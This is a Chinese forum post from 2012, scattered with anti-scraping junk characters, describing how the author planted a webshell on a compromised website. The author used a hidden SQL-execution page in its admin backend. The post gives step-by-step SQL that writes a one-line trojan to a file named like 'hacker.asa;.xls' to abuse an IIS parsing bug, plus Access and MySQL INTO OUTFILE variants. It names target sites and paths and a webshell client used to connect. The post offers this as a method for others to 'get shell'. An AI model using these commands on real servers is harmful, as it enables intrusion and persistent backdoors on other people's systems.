好不容易进了后台,发现啥上传啊。备份啊多木有。, }/ d e1 e( c- j" b6 M) K# [# x; P
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
+ [% J5 f: k* v$ d0 r$ Q$ |文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
6 U( o* Y2 g9 t然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:4 J5 |6 D7 T: d, [3 o& C% P
1.create table cmd (a varchar(50))$ l2 z! b. I+ j! b0 ~# V- c
2.insert into cmd (a) values (‘‘)
, _# l$ t0 G/ S3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
* g C+ O! d9 y) W, Z(把表cmd的内容导出为物理路径的一个EXCEL文件)8 t$ \$ t+ j6 f; M1 y" j, {
4.drop table cmd0 e" i$ p& ]% @% d
利用IIS的BUG成功拿到了WEBSHELL。+ w% _- L* v1 H* y! {
$ I% B# I! p& }
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
9 e+ d1 J. O" i% {1 ]$ }6 m- A: m/ m+ @5 H4 N v
SQL语句意思解释:
# E$ P4 c% t" _) K6 \1 C 第一句' A8 s% ]* E, h, i
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
2 V0 M# _! C0 M7 O+ A% y" c, k
" }5 u6 w* q: E- q% |$ a$ } 第二句
" b8 A% i2 D: ?) q2 M* ^ 在表cmd的a字段插入一句话木马
1 y0 v5 q' |* k: Y 第三句 c1 e& c; t+ {- Y$ o9 N
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
3 N, L3 Q3 l$ p, e. ^. w
3 g& D: [* j3 b 第四句# G/ K2 n' {2 L8 ~ h
删除建立的cmd表" [: x7 @4 d) }" S" m2 d9 {
6 l1 V2 o9 q# b6 m+ ?0 x
以下内容为测试:
4 V) R6 p, q7 }: l3 u Access利用后台SQL执行命令功能导出WebShell:
7 r# G1 U, R& c* V% a. D- R 这个更简单:! k' Z7 \' Q; z, z
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
5 A+ z- _7 W! m! e6 {6 K1 J 或者
* A0 }) J& e- L: j [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
7 `" i) e( R! v1 e/ f) ~1 ~! C- y' U4 f% E, ] m
后台有执行SQL语句功能(vote为已知表段). ~ }! f2 P4 M6 v8 L% b
希望对大家有所帮助拿shell的又一个思路
n. b( V4 } s0 [2 E$ y$ I) T |
发表于 2012-9-13 17:53:58
收藏
支持
反对